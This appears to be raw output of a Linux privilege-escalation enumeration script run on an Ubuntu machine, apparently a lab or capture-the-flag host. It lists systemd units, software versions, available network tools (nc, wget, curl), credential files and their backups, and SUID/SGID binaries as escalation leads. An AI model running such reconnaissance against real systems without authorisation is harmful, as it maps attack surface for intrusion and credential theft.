-rw-r--r-- 1 root root  693 Feb  1  2018 systemd-machine-id-commit.service
-rw-r--r-- 1 root root  967 Feb  1  2018 systemd-modules-load.service
-rw-r--r-- 1 root root  685 Feb  1  2018 systemd-networkd-wait-online.service
-rw-r--r-- 1 root root 1.3K Feb  1  2018 systemd-networkd.service
-rw-r--r-- 1 root root  591 Feb  1  2018 systemd-networkd.socket
-rw-r--r-- 1 root root  553 Feb  1  2018 systemd-poweroff.service
-rw-r--r-- 1 root root  614 Feb  1  2018 systemd-quotacheck.service
-rw-r--r-- 1 root root  717 Feb  1  2018 systemd-random-seed.service
-rw-r--r-- 1 root root  548 Feb  1  2018 systemd-reboot.service
-rw-r--r-- 1 root root  757 Feb  1  2018 systemd-remount-fs.service
-rw-r--r-- 1 root root  907 Feb  1  2018 systemd-resolved.service
-rw-r--r-- 1 root root  696 Feb  1  2018 systemd-rfkill.service
-rw-r--r-- 1 root root  617 Feb  1  2018 systemd-rfkill.socket
-rw-r--r-- 1 root root  497 Feb  1  2018 systemd-suspend.service
-rw-r--r-- 1 root root  649 Feb  1  2018 systemd-sysctl.service
-rw-r--r-- 1 root root  655 Feb  1  2018 systemd-timedated.service
-rw-r--r-- 1 root root 1.1K Feb  1  2018 systemd-timesyncd.service
-rw-r--r-- 1 root root  598 Feb  1  2018 systemd-tmpfiles-clean.service
-rw-r--r-- 1 root root  450 Feb  1  2018 systemd-tmpfiles-clean.timer
-rw-r--r-- 1 root root  703 Feb  1  2018 systemd-tmpfiles-setup-dev.service
-rw-r--r-- 1 root root  683 Feb  1  2018 systemd-tmpfiles-setup.service
-rw-r--r-- 1 root root  823 Feb  1  2018 systemd-udev-settle.service
-rw-r--r-- 1 root root  743 Feb  1  2018 systemd-udev-trigger.service
-rw-r--r-- 1 root root  578 Feb  1  2018 systemd-udevd-control.socket
-rw-r--r-- 1 root root  570 Feb  1  2018 systemd-udevd-kernel.socket
-rw-r--r-- 1 root root  825 Feb  1  2018 systemd-udevd.service
-rw-r--r-- 1 root root  757 Feb  1  2018 systemd-update-utmp-runlevel.service
-rw-r--r-- 1 root root  754 Feb  1  2018 systemd-update-utmp.service
-rw-r--r-- 1 root root  573 Feb  1  2018 systemd-user-sessions.service
-rw-r--r-- 1 root root  395 Feb  1  2018 time-sync.target
-rw-r--r-- 1 root root  405 Feb  1  2018 timers.target
-rw-r--r-- 1 root root  417 Feb  1  2018 umount.target
-rw-r--r-- 1 root root  392 Feb  1  2018 user.slice
-rw-r--r-- 1 root root  528 Feb  1  2018 user@.service
-rw-r--r-- 1 root root  246 Jan  2  2018 apport-forward.socket
-rw-r--r-- 1 root root  683 Dec  7  2017 lxd.service
-rw-r--r-- 1 root root  206 Dec  7  2017 lxd-bridge.service
-rw-r--r-- 1 root root  318 Dec  7  2017 lxd-containers.service
-rw-r--r-- 1 root root  197 Dec  7  2017 lxd.socket
-rw-r--r-- 1 root root  189 Nov 30  2017 uuidd.service
-rw-r--r-- 1 root root  126 Nov 30  2017 uuidd.socket
-rw-r--r-- 1 root root  252 Nov 30  2017 snapd.autoimport.service
-rw-r--r-- 1 root root  386 Nov 30  2017 snapd.core-fixup.service
-rw-r--r-- 1 root root  290 Nov 30  2017 snapd.refresh.service
-rw-r--r-- 1 root root  323 Nov 30  2017 snapd.refresh.timer
-rw-r--r-- 1 root root  308 Nov 30  2017 snapd.service
-rw-r--r-- 1 root root  253 Nov 30  2017 snapd.snap-repair.service
-rw-r--r-- 1 root root  281 Nov 30  2017 snapd.snap-repair.timer
-rw-r--r-- 1 root root  281 Nov 30  2017 snapd.socket
-rw-r--r-- 1 root root  474 Nov 30  2017 snapd.system-shutdown.service
-rw-r--r-- 1 root root  420 Nov 29  2017 resolvconf.service
-rw-r--r-- 1 root root  311 Nov  8  2017 lxcfs.service
-rw-r--r-- 1 root root  670 Nov  8  2017 mdadm-shutdown.service
-rw-r--r-- 1 root root  342 Oct 27  2017 getty-static.service
-rw-r--r-- 1 root root  153 Oct 27  2017 sigpwr-container-shutdown.service
-rw-r--r-- 1 root root  175 Oct 27  2017 systemd-networkd-resolvconf-update.path
-rw-r--r-- 1 root root  715 Oct 27  2017 systemd-networkd-resolvconf-update.service
lrwxrwxrwx 1 root root   27 Sep 13  2017 plymouth-log.service -> plymouth-read-write.service
lrwxrwxrwx 1 root root   21 Sep 13  2017 plymouth.service -> plymouth-quit.service
-rw-r--r-- 1 root root  412 Sep 13  2017 plymouth-halt.service
-rw-r--r-- 1 root root  426 Sep 13  2017 plymouth-kexec.service
-rw-r--r-- 1 root root  421 Sep 13  2017 plymouth-poweroff.service
-rw-r--r-- 1 root root  200 Sep 13  2017 plymouth-quit-wait.service
-rw-r--r-- 1 root root  194 Sep 13  2017 plymouth-quit.service
-rw-r--r-- 1 root root  244 Sep 13  2017 plymouth-read-write.service
-rw-r--r-- 1 root root  416 Sep 13  2017 plymouth-reboot.service
-rw-r--r-- 1 root root  532 Sep 13  2017 plymouth-start.service
-rw-r--r-- 1 root root  291 Sep 13  2017 plymouth-switch-root.service
-rw-r--r-- 1 root root  490 Sep 13  2017 systemd-ask-password-plymouth.path
-rw-r--r-- 1 root root  467 Sep 13  2017 systemd-ask-password-plymouth.service
-rw-r--r-- 1 root root  345 Apr 20  2017 unattended-upgrades.service
-rw-r--r-- 1 root root  385 Mar 16  2017 ssh.service
-rw-r--r-- 1 root root  216 Mar 16  2017 ssh.socket
-rw-r--r-- 1 root root  196 Mar 16  2017 ssh@.service
-rw-r--r-- 1 root root  411 Feb  3  2017 mysql.service
-rw-r--r-- 1 root root  269 Jan 31  2017 setvtrgb.service
-rw-r--r-- 1 root root  491 Jan 12  2017 dbus.service
-rw-r--r-- 1 root root  106 Jan 12  2017 dbus.socket
-rw-r--r-- 1 root root  735 Nov 30  2016 networking.service
-rw-r--r-- 1 root root  497 Nov 30  2016 ifup@.service
-rw-r--r-- 1 root root  631 Nov  3  2016 accounts-daemon.service
-rw-r--r-- 1 root root  285 Jun 16  2016 keyboard-setup.service
-rw-r--r-- 1 root root  288 Jun 16  2016 console-setup.service
lrwxrwxrwx 1 root root    9 Apr 16  2016 lvm2.service -> /dev/null
-rw-r--r-- 1 root root  334 Apr 16  2016 dm-event.service
-rw-r--r-- 1 root root  248 Apr 16  2016 dm-event.socket
-rw-r--r-- 1 root root  380 Apr 16  2016 lvm2-lvmetad.service
-rw-r--r-- 1 root root  215 Apr 16  2016 lvm2-lvmetad.socket
-rw-r--r-- 1 root root  335 Apr 16  2016 lvm2-lvmpolld.service
-rw-r--r-- 1 root root  213 Apr 16  2016 lvm2-lvmpolld.socket
-rw-r--r-- 1 root root  658 Apr 16  2016 lvm2-monitor.service
-rw-r--r-- 1 root root  382 Apr 16  2016 lvm2-pvscan@.service
drwxr-xr-x 2 root root 4.0K Apr 12  2016 runlevel1.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12  2016 runlevel2.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12  2016 runlevel3.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12  2016 runlevel4.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12  2016 runlevel5.target.wants
-rw-r--r-- 1 root root  234 Apr  8  2016 acpid.service
-rw-r--r-- 1 root root  251 Apr  5  2016 cron.service
-rw-r--r-- 1 root root  290 Apr  5  2016 rsyslog.service
-rw-r--r-- 1 root root  142 Mar 31  2016 apport-forward@.service
-rw-r--r-- 1 root root  455 Mar 29  2016 iscsid.service
-rw-r--r-- 1 root root 1.1K Mar 29  2016 open-iscsi.service
-rw-r--r-- 1 root root  248 Feb 10  2016 vsftpd.service
-rw-r--r-- 1 root root  115 Feb  9  2016 acpid.socket
-rw-r--r-- 1 root root  115 Feb  9  2016 acpid.path
-rw-r--r-- 1 root root  169 Jan 14  2016 atd.service
-rw-r--r-- 1 root root  182 Jan 14  2016 polkitd.service
-rw-r--r-- 1 root root  790 Jun  1  2015 friendly-recovery.service
-rw-r--r-- 1 root root  241 Mar  3  2015 ufw.service
-rw-r--r-- 1 root root  250 Feb 24  2015 ureadahead-stop.service
-rw-r--r-- 1 root root  242 Feb 24  2015 ureadahead-stop.timer
-rw-r--r-- 1 root root  401 Feb 24  2015 ureadahead.service
-rw-r--r-- 1 root root  188 Feb 24  2014 rsync.service

/lib/systemd/system/apache2.service.d:
total 4.0K
-rw-r--r-- 1 root root 42 Jun 11  2018 apache2-systemd.conf

/lib/systemd/system/halt.target.wants:
total 0
lrwxrwxrwx 1 root root 24 Sep 13  2017 plymouth-halt.service -> ../plymouth-halt.service

/lib/systemd/system/initrd-switch-root.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Sep 13  2017 plymouth-start.service -> ../plymouth-start.service
lrwxrwxrwx 1 root root 31 Sep 13  2017 plymouth-switch-root.service -> ../plymouth-switch-root.service

/lib/systemd/system/kexec.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Sep 13  2017 plymouth-kexec.service -> ../plymouth-kexec.service

/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 Dec 31  2019 getty.target -> ../getty.target
lrwxrwxrwx 1 root root 33 Dec 31  2019 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path
lrwxrwxrwx 1 root root 25 Dec 31  2019 systemd-logind.service -> ../systemd-logind.service
lrwxrwxrwx 1 root root 39 Dec 31  2019 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 32 Dec 31  2019 systemd-user-sessions.service -> ../systemd-user-sessions.service
lrwxrwxrwx 1 root root 29 Sep 13  2017 plymouth-quit-wait.service -> ../plymouth-quit-wait.service
lrwxrwxrwx 1 root root 24 Sep 13  2017 plymouth-quit.service -> ../plymouth-quit.service
lrwxrwxrwx 1 root root 15 Jan 12  2017 dbus.service -> ../dbus.service

/lib/systemd/system/poweroff.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Dec 31  2019 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 28 Sep 13  2017 plymouth-poweroff.service -> ../plymouth-poweroff.service

/lib/systemd/system/reboot.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Dec 31  2019 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 26 Sep 13  2017 plymouth-reboot.service -> ../plymouth-reboot.service

/lib/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 root root 22 Dec 31  2019 dev-hugepages.mount -> ../dev-hugepages.mount
lrwxrwxrwx 1 root root 19 Dec 31  2019 dev-mqueue.mount -> ../dev-mqueue.mount
lrwxrwxrwx 1 root root 25 Dec 31  2019 keyboard-setup.service -> ../keyboard-setup.service
lrwxrwxrwx 1 root root 28 Dec 31  2019 kmod-static-nodes.service -> ../kmod-static-nodes.service
lrwxrwxrwx 1 root root 36 Dec 31  2019 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount
lrwxrwxrwx 1 root root 19 Dec 31  2019 setvtrgb.service -> ../setvtrgb.service
lrwxrwxrwx 1 root root 32 Dec 31  2019 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount
lrwxrwxrwx 1 root root 26 Dec 31  2019 sys-kernel-config.mount -> ../sys-kernel-config.mount
lrwxrwxrwx 1 root root 25 Dec 31  2019 sys-kernel-debug.mount -> ../sys-kernel-debug.mount
lrwxrwxrwx 1 root root 36 Dec 31  2019 systemd-ask-password-console.path -> ../systemd-ask-password-console.path
lrwxrwxrwx 1 root root 25 Dec 31  2019 systemd-binfmt.service -> ../systemd-binfmt.service
lrwxrwxrwx 1 root root 30 Dec 31  2019 systemd-hwdb-update.service -> ../systemd-hwdb-update.service
lrwxrwxrwx 1 root root 32 Dec 31  2019 systemd-journal-flush.service -> ../systemd-journal-flush.service
lrwxrwxrwx 1 root root 27 Dec 31  2019 systemd-journald.service -> ../systemd-journald.service
lrwxrwxrwx 1 root root 36 Dec 31  2019 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service
lrwxrwxrwx 1 root root 31 Dec 31  2019 systemd-modules-load.service -> ../systemd-modules-load.service
lrwxrwxrwx 1 root root 30 Dec 31  2019 systemd-random-seed.service -> ../systemd-random-seed.service
lrwxrwxrwx 1 root root 25 Dec 31  2019 systemd-sysctl.service -> ../systemd-sysctl.service
lrwxrwxrwx 1 root root 37 Dec 31  2019 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
lrwxrwxrwx 1 root root 33 Dec 31  2019 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service
lrwxrwxrwx 1 root root 31 Dec 31  2019 systemd-udev-trigger.service -> ../systemd-udev-trigger.service
lrwxrwxrwx 1 root root 24 Dec 31  2019 systemd-udevd.service -> ../systemd-udevd.service
lrwxrwxrwx 1 root root 30 Dec 31  2019 systemd-update-utmp.service -> ../systemd-update-utmp.service
lrwxrwxrwx 1 root root 24 Dec 31  2019 console-setup.service -> ../console-setup.service
lrwxrwxrwx 1 root root 20 Dec 31  2019 cryptsetup.target -> ../cryptsetup.target
lrwxrwxrwx 1 root root 30 Sep 13  2017 plymouth-read-write.service -> ../plymouth-read-write.service
lrwxrwxrwx 1 root root 25 Sep 13  2017 plymouth-start.service -> ../plymouth-start.service

/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Dec 31  2019 systemd-initctl.socket -> ../systemd-initctl.socket
lrwxrwxrwx 1 root root 32 Dec 31  2019 systemd-journald-audit.socket -> ../systemd-journald-audit.socket
lrwxrwxrwx 1 root root 34 Dec 31  2019 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket
lrwxrwxrwx 1 root root 26 Dec 31  2019 systemd-journald.socket -> ../systemd-journald.socket
lrwxrwxrwx 1 root root 31 Dec 31  2019 systemd-udevd-control.socket -> ../systemd-udevd-control.socket
lrwxrwxrwx 1 root root 30 Dec 31  2019 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket
lrwxrwxrwx 1 root root 14 Jan 12  2017 dbus.socket -> ../dbus.socket

/lib/systemd/system/systemd-resolved.service.d:
total 4.0K
-rw-r--r-- 1 root root 200 Oct 27  2017 resolvconf.conf

/lib/systemd/system/systemd-timesyncd.service.d:
total 4.0K
-rw-r--r-- 1 root root 251 Oct 26  2017 disable-with-time-daemon.conf

/lib/systemd/system/timers.target.wants:
total 0
lrwxrwxrwx 1 root root 31 Dec 31  2019 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer

/lib/systemd/system/getty.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Dec 31  2019 getty-static.service -> ../getty-static.service

/lib/systemd/system/graphical.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Dec 31  2019 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/local-fs.target.wants:
total 0
lrwxrwxrwx 1 root root 29 Dec 31  2019 systemd-remount-fs.service -> ../systemd-remount-fs.service

/lib/systemd/system/rc-local.service.d:
total 4.0K
-rw-r--r-- 1 root root 290 Oct 26  2017 debian.conf

/lib/systemd/system/rescue.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Dec 31  2019 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/resolvconf.service.wants:
total 0
lrwxrwxrwx 1 root root 42 Dec 31  2019 systemd-networkd-resolvconf-update.path -> ../systemd-networkd-resolvconf-update.path

/lib/systemd/system/sigpwr.target.wants:
total 0
lrwxrwxrwx 1 root root 36 Dec 31  2019 sigpwr-container-shutdown.service -> ../sigpwr-container-shutdown.service

/lib/systemd/system/busnames.target.wants:
total 0

/lib/systemd/system/runlevel1.target.wants:
total 0

/lib/systemd/system/runlevel2.target.wants:
total 0

/lib/systemd/system/runlevel3.target.wants:
total 0

/lib/systemd/system/runlevel4.target.wants:
total 0

/lib/systemd/system/runlevel5.target.wants:
total 0

/lib/systemd/system-shutdown:
total 4.0K
-rwxr-xr-x 1 root root 160 Nov  8  2017 mdadm.shutdown

/lib/systemd/system-generators:
total 680K
-rwxr-xr-x 1 root root  71K Feb  1  2018 systemd-cryptsetup-generator
-rwxr-xr-x 1 root root  59K Feb  1  2018 systemd-dbus1-generator
-rwxr-xr-x 1 root root  43K Feb  1  2018 systemd-debug-generator
-rwxr-xr-x 1 root root  79K Feb  1  2018 systemd-fstab-generator
-rwxr-xr-x 1 root root  39K Feb  1  2018 systemd-getty-generator
-rwxr-xr-x 1 root root 119K Feb  1  2018 systemd-gpt-auto-generator
-rwxr-xr-x 1 root root  39K Feb  1  2018 systemd-hibernate-resume-generator
-rwxr-xr-x 1 root root  39K Feb  1  2018 systemd-insserv-generator
-rwxr-xr-x 1 root root  35K Feb  1  2018 systemd-rc-local-generator
-rwxr-xr-x 1 root root  31K Feb  1  2018 systemd-system-update-generator
-rwxr-xr-x 1 root root 103K Feb  1  2018 systemd-sysv-generator
-rwxr-xr-x 1 root root  11K Apr 16  2016 lvm2-activation-generator

/lib/systemd/system-sleep:
total 4.0K
-rwxr-xr-x 1 root root 92 Mar 17  2016 hdparm

/lib/systemd/system-preset:
total 4.0K
-rw-r--r-- 1 root root 869 Feb  1  2018 90-systemd.preset

/lib/systemd/network:
total 12K
-rw-r--r-- 1 root root 404 Feb  1  2018 80-container-host0.network
-rw-r--r-- 1 root root 482 Feb  1  2018 80-container-ve.network
-rw-r--r-- 1 root root  80 Feb  1  2018 99-default.link


[00;33m### SOFTWARE #############################################[00m
[00;31m[-] Sudo version:[00m
Sudo version 1.8.16


[00;31m[-] MYSQL version:[00m
mysql  Ver 14.14 Distrib 5.7.28, for Linux (x86_64) using  EditLine wrapper


[00;31m[-] Apache version:[00m
Server version: Apache/2.4.18 (Ubuntu)
Server built:   2019-10-08T13:31:25


[00;31m[-] Apache user configuration:[00m
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data


[00;31m[-] Installed Apache modules:[00m
Loaded Modules:
 core_module (static)
 so_module (static)
 watchdog_module (static)
 http_module (static)
 log_config_module (static)
 logio_module (static)
 version_module (static)
 unixd_module (static)
 access_compat_module (shared)
 alias_module (shared)
 auth_basic_module (shared)
 authn_core_module (shared)
 authn_file_module (shared)
 authz_core_module (shared)
 authz_host_module (shared)
 authz_user_module (shared)
 autoindex_module (shared)
 deflate_module (shared)
 dir_module (shared)
 env_module (shared)
 filter_module (shared)
 mime_module (shared)
 mpm_prefork_module (shared)
 negotiation_module (shared)
 php5_module (shared)
 setenvif_module (shared)
 status_module (shared)


[00;33m### INTERESTING FILES ####################################[00m
[00;31m[-] Useful file locations:[00m
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/curl


[00;31m[-] Can we read/write sensitive files:[00m
-rw-r--r-- 1 root root 1717 Dec 31  2019 /etc/passwd
-rw-r--r-- 1 root root 862 Dec 31  2019 /etc/group
-rw-r--r-- 1 root root 575 Oct 22  2015 /etc/profile
-rw-r----- 1 root shadow 1123 Dec 31  2019 /etc/shadow


[00;31m[-] SUID files:[00m
-rwsr-xr-x 1 root root 142032 Jan 28  2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 40128 May 16  2017 /bin/su
-rwsr-xr-x 1 root root 30800 Jul 12  2016 /bin/fusermount
-rwsr-xr-x 1 root root 27608 Nov 30  2017 /bin/umount
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 40152 Nov 30  2017 /bin/mount
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 14864 Jan 17  2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 428240 Jan 18  2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 85832 Nov 30  2017 /usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root messagebus 42992 Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-- 1 root telnetd 10808 May  6  2015 /usr/lib/telnetlogin
-rwsr-xr-x 1 root root 38984 Jun 14  2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 23376 Jan 17  2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 32944 May 16  2017 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 54256 May 16  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 75304 May 16  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 49584 May 16  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 32944 May 16  2017 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 39904 May 16  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 136808 Jul  4  2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 40432 May 16  2017 /usr/bin/chsh
-rwsr-sr-x 1 daemon daemon 51464 Jan 14  2016 /usr/bin/at


[00;31m[-] SGID files:[00m
-rwxr-sr-x 1 root shadow 35600 Mar 16  2016 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 35632 Mar 16  2016 /sbin/pam_extrausers_chkpwd
-rwsr-sr-x 1 root root 85832 Nov 30  2017 /usr/lib/snapd/snap-confine
-rwxr-sr-x 1 root utmp 10232 Mar 11  2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root tty 14752 Mar  1  2016 /usr/bin/bsd-write
-rwxr-sr-x 1 root crontab 36080 Apr  5  2016 /usr/bin/crontab
-rwxr-sr-x 1 root mlocate 39520 Nov 18  2014 /usr/bin/mlocate
-rwxr-sr-x 1 root ssh 358624 Jan 18  2018 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 62336 May 16  2017 /usr/bin/chage
-rwxr-sr-x 1 root tty 27368 Nov 30  2017 /usr/bin/wall
-rwxr-sr-x 1 root shadow 22768 May 16  2017 /usr/bin/expiry
-rwxr-sr-x 1 root utmp 434216 Feb  7  2016 /usr/bin/screen
-rwsr-sr-x 1 daemon daemon 51464 Jan 14  2016 /usr/bin/at


[00;31m[+] Files with POSIX capabilities set:[00m
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[00;31m[-] All *.conf files in /etc (recursive 1 level):[00m
-rw-r--r-- 1 root root 604 Jul  2  2015 /etc/deluser.conf
-rw-r--r-- 1 root root 3028 Feb 28  2018 /etc/adduser.conf
-rw-r--r-- 1 root root 771 Mar  6  2015 /etc/insserv.conf
-rw-r--r-- 1 root root 552 Mar 16  2016 /etc/pam.conf
-rw-r--r-- 1 root root 14867 Apr 12  2016 /etc/ltrace.conf
-rw-r--r-- 1 root root 1371 Jan 27  2016 /etc/rsyslog.conf
-rw-r--r-- 1 root root 289 Oct 26  2013 /etc/xinetd.conf
-rw-r--r-- 1 root root 6920 Jan 11  2018 /etc/overlayroot.conf
-rw-r--r-- 1 root root 2584 Feb 18  2016 /etc/gai.conf
-rw-r--r-- 1 root root 92 Oct 22  2015 /etc/host.conf
-rw-r--r-- 1 root root 5850 Apr 13  2016 /etc/vsftpd.conf
-rw-r--r-- 1 root root 6488 Dec 31  2019 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 967 Oct 30  2015 /etc/mke2fs.conf
-rw-r--r-- 1 root root 703 May  6  2015 /etc/logrotate.conf
-rw-r--r-- 1 root root 2084 Sep  6  2015 /etc/sysctl.conf
-rw-r--r-- 1 root root 34 Jan 27  2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 1260 Mar 16  2016 /etc/ucf.conf
-rw-r--r-- 1 root root 497 May  4  2014 /etc/nsswitch.conf
-rw-r--r-- 1 root root 350 Dec 31  2019 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 2969 Nov 10  2015 /etc/debconf.conf
-rw-r--r-- 1 root root 4781 Mar 17  2016 /etc/hdparm.conf
-rw-r--r-- 1 root root 191 Jan 18  2016 /etc/libaudit.conf
-rw-r--r-- 1 root root 100 Apr 11  2017 /etc/sos.conf
-rw-r--r-- 1 root root 280 Jun 20  2014 /etc/fuse.conf
-rw-r--r-- 1 root root 338 Nov 18  2014 /etc/updatedb.conf
-rw-r--r-- 1 root root 144 Dec 31  2019 /etc/kernel-img.conf


[00;31m[-] Location and contents (if accessible) of .bash_history file(s):[00m
/home/dorothy/.bash_history


[00;31m[-] Location and Permissions (if accessible) of .bak file(s):[00m
-rw------- 1 root shadow 1123 Dec 31  2019 /var/backups/shadow.bak
-rw------- 1 root root 1717 Dec 31  2019 /var/backups/passwd.bak
-rw------- 1 root shadow 726 Dec 31  2019 /var/backups/gshadow.bak
-rw------- 1 root root 862 Dec 31  2019 /var/backups/group.bak


[00;31m[-] Any interesting mail in /var/mail:[00m
total 8
drwxrwsr-x  2 root mail 4096 Feb 28  2018 .
drwxr-xr-x 14 root root 4096 Dec 31  2019 ..


[00;33m### SCAN COMPLETE ####################################[00m
